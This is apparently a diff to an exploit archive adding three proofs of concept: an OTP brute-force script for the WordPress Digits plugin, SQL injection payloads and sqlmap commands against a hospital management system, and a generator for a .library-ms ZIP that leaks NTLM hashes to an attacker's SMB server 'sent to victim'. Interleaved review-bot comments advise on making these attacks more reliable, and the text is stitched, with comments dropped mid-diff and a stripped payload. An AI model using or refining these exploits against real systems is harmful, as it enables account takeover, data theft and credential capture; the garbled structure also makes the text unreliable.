+ main() + except KeyboardInterrupt: + print(f"\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}") + sys.exit(0) + except Exception as e: + print(f"\n{Fore.RED}[!] An error occurred: {e}{Style.RESET_ALL}") + sys.exit(1) \ No newline at end of file diff --git a/exploits/multiple/webapps/52307.txt b/exploits/multiple/webapps/52307.txt new file mode 100644 index 000000000..aa862ebaa --- /dev/null 
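Review bot: Several payloads in `get_default_payloads` (and the `Alt` variant in `create_custom_payload`) carry a stray `^` before `&InternalFile=`, e.g. `.../Serv-U/^&InternalFile=...` and `.../etc^&InternalFile=passwd`; `^` is the cmd.exe escape for `&` and has no meaning in a URL sent by `requests`, so those requests ask for a directory literally named `etc^` and can never reach the intended file — drop the caret. The vulnerability oracle in `scan_target` is also weak: any 200 body longer than 100 bytes that contains `Windows`, `/etc/` or `/var/` is reported as VULNERABLE and written to `vulnerable_files/`, which a login page, a WAF block page or an error page can easily satisfy; tie each payload to the marker it should contain (`[fonts]`/`[extensions]` for win.ini, `root:x:0:0` for passwd, a Serv-U log line for the log files) and reject HTML bodies, e.g. `if len(content) > 100 and "<html" not in content.lower() and payload.get("marker", "") in content:`. As rendered here, `create_custom_payload` never interpolates its `filename` argument — the f-strings contain the literal `(unknown)` where `{filename}` belongs — which may be an artefact of this page, but if it is in the file the `-n/--filename` option is dead; please verify. The bare `except: pass` in `is_vulnerable_version` should be `except ValueError:` so a real bug is not hidden.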
+++ b/exploits/multiple/webapps/52307.txt 
@@ -0,0 +1,74 @@
+# Exploit Title: WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
+# Google Dork: inurl:/wp-content/plugins/digits/
+# Date: 2025-04-30
+# Exploit Author: Saleh Tarawneh
+# Vendor Homepage: https://digits.unitedover.com/
+# Version: < 8.4.6.1
+# CVE : CVE-2025-4094
+
+"""
+The Digits plugin for WordPress prior to version 8.4.6.1 is vulnerable to OTP brute-force attacks due to missing rate limiting.
+An attacker can exploit this to bypass authentication or password reset by iterating over possible OTP values.
+
+This PoC targets the "Forgot Password" flow and automates the attack, which is the same concept that is valid for the registration flow.
+
+CWE-287: Improper Authentication
+CVSS v3.1: 9.8 (Critical)
+OWASP A2: Broken Authentication
+
+[Instructions]
+1. Use a tool like Burp Suite or your browser’s developer tools to intercept the OTP verification request.
+2. Copy the exact request parameters
+3. Replace the placeholder values in the script with real data from the intercepted request.
+4. Run the script to brute-force 4-digit OTPs (0000 to 9999) or you can change it to 6-digit.
+
+[Alternative Method – Burp Suite Pro]
+
+If you have Burp Suite Pro, you can perform the OTP brute-force attack manually:
+
+1. Intercept the OTP request using Burp Proxy.
+2. Send the request to Intruder.
+3. Mark the `sms_otp` parameter as the payload position.
+4. Load a payload list from `000000` to `999999` (for 6-digit OTPs).
+5. Start the attack and monitor responses for a different status code, length, or success message.
+
+"""
+
+import requests
+
+def brute(otp):
+ url = "https://example.com/wp-admin/admin-ajax.php"
+ data = { # Replace with targets data
+ "login_digt_countrycode": "+",
+ "digits_phone": "000000000",
+ "action_type": "phone",
+ "sms_otp": otp,
+ "otp_step_1": "1",
+ "instance_id": "xxxxxxx",
+ "action": "digits_forms_ajax",
+ "type": "forgot",
+ "forgot_pass_method": "sms_otp",
+ "digits": "1",
+ "digits_redirect_page": "//example.com/",
+ "digits_form": "xxxxxxxx",
+ "_wp_http_referer": "/?login=true"
+ }
+ headers = {
+ "User-Agent": "Mozilla/5.0",
+ "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+ "X-Requested-With": "XMLHttpRequest",
+ "Referer": "https://example.com/?login=true" # Replace with intercepted referer
+ }
+ response = requests.post(url, data=data, headers=headers)
+ if '"success":true' in response.text:
+ print(f"[+] OTP FOUND: {otp}")
+ exit()
+
+def main():
+ for otp in range(0, 10000): # range(0, 1000000): for 6-digit
+ otp_str = f"{otp:04d}" # {otp:06d} for 6-digit
+ print(f"[*] Trying OTP: {otp_str}")
+ brute(otp_str)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52312.txt b/exploits/multiple/webapps/52312.txt
new file mode 100644
index 000000000..c3a761653
--- /dev/null
+++ b/exploits/multiple/webapps/52312.txt
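Review bot: `response = requests.post(url, data=data, headers=headers)` in `brute()` has no `timeout=` and no exception handling, so one hung connection or transient error stalls or aborts the whole 10,000-request loop and loses its position; use `requests.post(url, data=data, headers=headers, timeout=10)` and catch `requests.RequestException` around it so the loop moves on to the next OTP. The success check `'"success":true' in response.text` depends on the server's exact JSON spacing; parsing `response.json().get("success")` after checking `response.status_code` is more robust. `exit()` here is the `site` module helper, and `sys.exit(0)` is the correct call from a script. The docstring should also state that `instance_id` and `digits_form` are copied from a single intercepted request and presumably bind the attempts to that OTP session, so an OTP that expires or is regenerated mid-run silently invalidates the rest of the sweep — worth confirming against the plugin before relying on the full 0000–9999 range.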
@@ -0,0 +1,72 @@
+# Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection
+# Google Dork: N/A
+# Exploit Author: Carine Constantino
+# Vendor Homepage: https://www.campcodes.com
+# Software Link: https://www.campcodes.com/projects/online-hospital-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Linux - Ubuntu Ubuntu 23.10
+# CVE: CVE-2025-5298
+
+# Campcodes Online Hospital Management System 1.0 is vulnerable to SQL Injection
+# The report in admin/betweendates-detailsreports.php does not validate ‘fromdate’ and ‘todate’ fields
+# And allows the processing of SQL Injection queries of the types:
+
+# blind time-based in the ‘fromdate’ field
+# boolean-based in the ‘todate’ field
+# Union Query in the ‘todate’ field
+
+‘fromdate’ field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
+
+POST /HospitalManagementSystem/hospital/hms/admin/betweendates-detailsreports.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 45
+Origin: http://127.0.0.1
+Connection: keep-alive
+Referer: http://127.0.0.1/HospitalManagementSystem/hospital/hms/admin/between-dates-reports.php
+Cookie: ajs_anonymous_id=e18be7d3-2b50-4bed-9962-5cfab989426f; PHPSESSID=hfb8j1phivvf11o2j9cd492oqe
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+
+fromdate=&todate=&submit=
+
+=======================================|| Blind Time Based - ‘fromdate’ field ||==============================================
+
+SQLMap identified the following injection payload:
+
+Parameter: fromdate (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: fromdate=2019-01-01' AND (SELECT 5962 FROM
(SELECT(SLEEP(5)))danz) AND 'awPP'='awPP&todate=2025-05-28&submit=
+
+SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p fromdate --dbs --random-agent --technique=T”
+
+
+=======================================|| Boolean Based - ‘todate’ field ||==============================================
+
+‘todate’ field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
+SQLMap identified the following injection payload:
+
+Parameter: todate (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: fromdate=2019-01-01&todate=2025-05-28' AND 3290=3290 AND 'yOfc'='yOfc&submit=
+
+SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=B”
+
+=======================================|| Union Query - ‘todate’ field ||==============================================
+
+Another technique on ‘todate’ field can be exploited
+SQLMap identified the following injection payload:
+
+Parameter: todate (POST)
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 11 columns
+ Payload: fromdate=2019-01-01&todate=2025-05-28' UNION ALL SELECT CONCAT(CONCAT('qkpxq','eLwmjRlXmPYByrACqjbUDqzOqYmBeKwQSUSMNXdM'),'qzzbq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ckvh&submit=
+
+
+SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=U”
\ No newline at end of file
diff --git a/exploits/windows/remote/52310.py b/exploits/windows/remote/52310.py
new file mode 100755
index 000000000..cde0bf91b
--- /dev/null
+++ b/exploits/windows/remote/52310.py
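Review bot: The reproduction request carries a `PHPSESSID` cookie and hits a path under `/admin/`, yet the advisory never states whether an authenticated admin session is needed to reach `betweendates-detailsreports.php`; that decides whether this is pre-auth or post-auth SQL injection and belongs in the header, e.g. `# Authentication: admin session required` or `# Authentication: none`. The header says the two fields are "not validated" but does not name the PHP statement that concatenates `fromdate`/`todate` into the query, so a reader cannot confirm the 11-column UNION count or judge a fix; one sentence pointing at the vulnerable query would do. Minor: `Content-Length: 45` does not match the 25-byte body `fromdate=&todate=&submit=` shown below it, which suggests the body was edited after capture; showing the request exactly as sent (or the sqlmap `request.txt`) avoids that confusion.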
@@ -0,0 +1,85 @@
+#!/usr/bin/env python3
+# Exploit Title: Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
+# Exploit Author: Mohammed Idrees Banyamer
+# Twitter/GitHub:https://github.com/mbanyamer
+# Date: 2025-05-27
+# CVE: CVE-2025-24071
+# Vendor: Microsoft
+# Affected Versions: Windows 10/11 (All supporting .library-ms and SMB)
+# Tested on: Windows 11 (23H2)
+# Type: Local / Remote (NTLM Leak)
+# Platform: Windows
+# Vulnerability Type: Information Disclosure
+# Description:
+# Windows Explorer automatically initiates an SMB authentication request when a
+# .library-ms file is extracted from a ZIP archive. This causes NTLM credentials
+# (in hashed format) to be leaked to a remote SMB server controlled by the attacker.
+# No user interaction is required beyond extraction.
+
+import zipfile
+from pathlib import Path
+import argparse
+import re
+import sys
+from colorama import Fore, Style
+
+def create_library_ms(ip: str, filename: str, output_dir: Path) -> Path:
+ """Creates a malicious .library-ms file pointing to an attacker's SMB server."""
+ payload = f'''
+
+
+
+
+ \\\\{ip}\\shared
+
+
+
+'''
+
+ output_file = output_dir / f"(unknown).library-ms"
+ output_file.write_text(payload, encoding="utf-8")
+ return output_file
+
+def build_zip(library_file: Path, output_zip: Path):
+ """Packages the .library-ms file into a ZIP archive."""
+ with zipfile.ZipFile(output_zip, 'w', zipfile.ZIP_DEFLATED) as archive:
+ archive.write(library_file, arcname=library_file.name)
+ print(f"{Fore.GREEN}[+] Created ZIP: {output_zip}{Style.RESET_ALL}")
+
+def is_valid_ip(ip: str) -> bool:
+ return re.match(r"^\d{1,3}(\.\d{1,3}){3}$", ip) is not None
+
+def main():
+ parser = argparse.ArgumentParser(
+ description="CVE-2025-24071 - NTLM Hash Disclosure via .library-ms ZIP Archive",
+ epilog="example:\n python3 CVE-2025-24071_tool.py -i 192.168.1.100 -n payload1 -o ./output_folder --keep",
+ formatter_class=argparse.RawTextHelpFormatter
+ )
+
+ 
parser.add_argument("-i", "--ip", required=True, help="Attacker SMB IP address (e.g., 192.168.1.100)")
+ parser.add_argument("-n", "--name", default="malicious", help="Base filename (default: malicious)")
+ parser.add_argument("-o", "--output", default="output", help="Output directory (default: ./output)")
+ parser.add_argument("--keep", action="store_true", help="Keep .library-ms file after ZIP creation")
+
+ args = parser.parse_args()
+
+ if not is_valid_ip(args.ip):
+ print(f"{Fore.RED}[!] Invalid IP address: {args.ip}{Style.RESET_ALL}")
+ sys.exit(1)
+
+ output_dir = Path(args.output)
+ output_dir.mkdir(parents=True, exist_ok=True)
+
+ print(f"{Fore.CYAN}[*] Generating malicious .library-ms file...{Style.RESET_ALL}")
+ library_file = create_library_ms(args.ip, args.name, output_dir)
+ zip_file = output_dir / f"{args.name}.zip"
+ build_zip(library_file, zip_file)
+
+ if not args.keep:
+ library_file.unlink()
+ print(f"{Fore.YELLOW}[-] Removed intermediate .library-ms file{Style.RESET_ALL}")
+
+ print(f"{Fore.MAGENTA}[!] Done. Send ZIP to victim and listen for NTLM hash on your SMB server.{Style.RESET_ALL}")
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 29175d14f..aea095c41 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
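Review bot: As shown, the `payload` f-string in `create_library_ms` holds only `\\\\{ip}\\shared` between blank lines, with no XML declaration or library/location elements, so Explorer has nothing to parse as a library definition; if the markup was stripped in transcription it needs restoring, otherwise the PoC writes an invalid `.library-ms` file. In the same function `output_file = output_dir / f"(unknown).library-ms"` has no placeholder, so the `filename` argument (`args.name` from `main`) is silently ignored and every run produces the same file name inside the ZIP; it should be `output_file = output_dir / f"{filename}.library-ms"`. `is_valid_ip` accepts octets up to 999 and rejects hostnames and IPv6; the stdlib `ipaddress.ip_address(ip)` wrapped in a `try/except ValueError` is stricter and shorter. The header's "No user interaction is required beyond extraction" reads as a contradiction — extraction is the interaction — and should say plainly that the victim must extract the archive for the SMB request to fire.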
@@ -10794,6 +10794,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,,2019-04-19,2019-04-19,1,CVE-2019-3396,Remote,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/confluence_widget_connector.rb
 38905,exploits/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection (Metasploit)",2015-12-08,Metasploit,remote,multiple,8080,2015-12-08,2015-12-08,1,CVE-2015-5603;OSVDB-126829,"Metasploit Framework (MSF)",,,,https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html
 35898,exploits/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",remote,multiple,,2011-06-28,2015-01-26,1,,,,,,https://www.securityfocus.com/bid/48484/info
+52309,exploits/multiple/remote/52309.txt,"Automic Agent 24.3.0 HF4 - Privilege Escalation",2025-05-29,"Flora Schäfer",remote,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4971,,,,,
 22296,exploits/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x - Messages Information Disclosure",2003-02-28,"Martin Eiszner",remote,multiple,,2003-02-28,2012-10-28,1,CVE-2003-1386;OSVDB-4806,,,,,https://www.securityfocus.com/bid/6980/info
 43985,exploits/multiple/remote/43985.txt,"Axis Communications MPQT/PACS - Heap Overflow / Information Leakage",2017-11-30,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/9a1d3d165d7b32addf6d0a9ccf86626ee7e76093/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt
 40125,exploits/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format
String",2016-07-19,bashis,remote,multiple,,2016-07-19,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/53a2d49c1e4076e8559bb937f790e724fc52ca1d/axis-ssid-PoC.py
@@ -10936,6 +10937,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28210,exploits/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple,,2006-07-12,2013-09-11,1,CVE-2006-3624;OSVDB-28644,,,,,https://www.securityfocus.com/bid/18954/info
 36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple,,2011-08-03,2015-02-07,1,,,,,,https://www.securityfocus.com/bid/48982/info
 39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple,,2014-06-05,2016-01-11,1,CVE-2014-0007;OSVDB-108277,,,,,https://www.securityfocus.com/bid/68117/info
+52308,exploits/multiple/remote/52308.py,"Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-0204,,,,,
 23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple,,2004-02-16,2012-12-31,1,CVE-2004-0290;OSVDB-3982,,,,,https://www.securityfocus.com/bid/9671/info
 29873,exploits/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,remote,multiple,,2007-04-20,2013-11-28,1,CVE-2007-2191;OSVDB-35315,,,,,https://www.securityfocus.com/bid/23575/info
 47698,exploits/multiple/remote/47698.rb,"FreeSWITCH - Event Socket Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,,2019-11-20,2019-11-20,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb
@@ -11532,6 +11534,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 27931,exploits/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",remote,multiple,,2006-05-31,2013-08-29,1,CVE-2006-2769;OSVDB-25837,,,,,https://www.securityfocus.com/bid/18200/info
 21029,exploits/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",remote,multiple,,2001-07-25,2012-09-03,1,OSVDB-88584;OSVDB-88583,,,,,https://www.securityfocus.com/bid/3097/info
 16324,exploits/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,remote,multiple,,2010-06-22,2016-10-27,1,CVE-2003-0722;OSVDB-4585,"Metasploit Framework (MSF)",,,,
+52311,exploits/multiple/remote/52311.py,"SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-28995,,,,,
 36537,exploits/multiple/remote/36537.txt,"SonicWALL AntiSpam & EMail 7.3.1 - Multiple Vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",remote,multiple,,2012-01-10,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/51337/info
 31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,,2008-05-08,2014-02-19,1,CVE-2008-2162;OSVDB-45017,,,,,https://www.securityfocus.com/bid/29107/info
 24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple,,2013-01-24,2013-01-24,0,CVE-2013-1359;OSVDB-89347,"Metasploit Framework (MSF)",,,,
@@ -11836,6 +11839,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48145,exploits/multiple/webapps/48145.py,"Cacti 1.2.8 - Unauthenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/dfb48378f39249ff54ecf24ccd3b89db26971ccf/Cacti-preauth-rce.py
 52067,exploits/multiple/webapps/52067.txt,"Calibre-web 0.6.21 - Stored XSS",2024-08-23,"Catalin Iovita_ Alexandru Postolache",webapps,multiple,,2024-08-23,2024-08-23,0,,,,,,
 18430,exploits/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",webapps,multiple,,2012-01-30,2012-01-30,0,OSVDB-78888,,,,,
+52312,exploits/multiple/webapps/52312.txt,"Campcodes Online Hospital Management System 1.0 - SQL Injection",2025-05-29,"Carine Constantino",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-5298,,,,,
 18247,exploits/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",webapps,multiple,,2011-12-16,2011-12-16,1,OSVDB-77998;CVE-2011-5031,,,,,
 50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",2022-02-28,"Mayank Deshmukh",webapps,multiple,,2022-02-28,2022-02-28,0,CVE-2022-24124,,,,,
 48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,,2020-06-04,2020-06-04,0,,,,,,
@@ -12504,6 +12508,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
 47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011
+52307,exploits/multiple/webapps/52307.txt,"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing",2025-05-29,"Saleh Tarawneh",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4094,,,,,
 52291,exploits/multiple/webapps/52291.py,"WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation",2025-05-13,"Md Shoriful Islam",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-3605,,,,,
 49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
 48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
@@ -45941,6 +45946,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
 52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
+52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,
 30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info
 16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,,
 7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21,2009-01-25,2016-09-27,1,OSVDB-51667;CVE-2009-0351,,,,,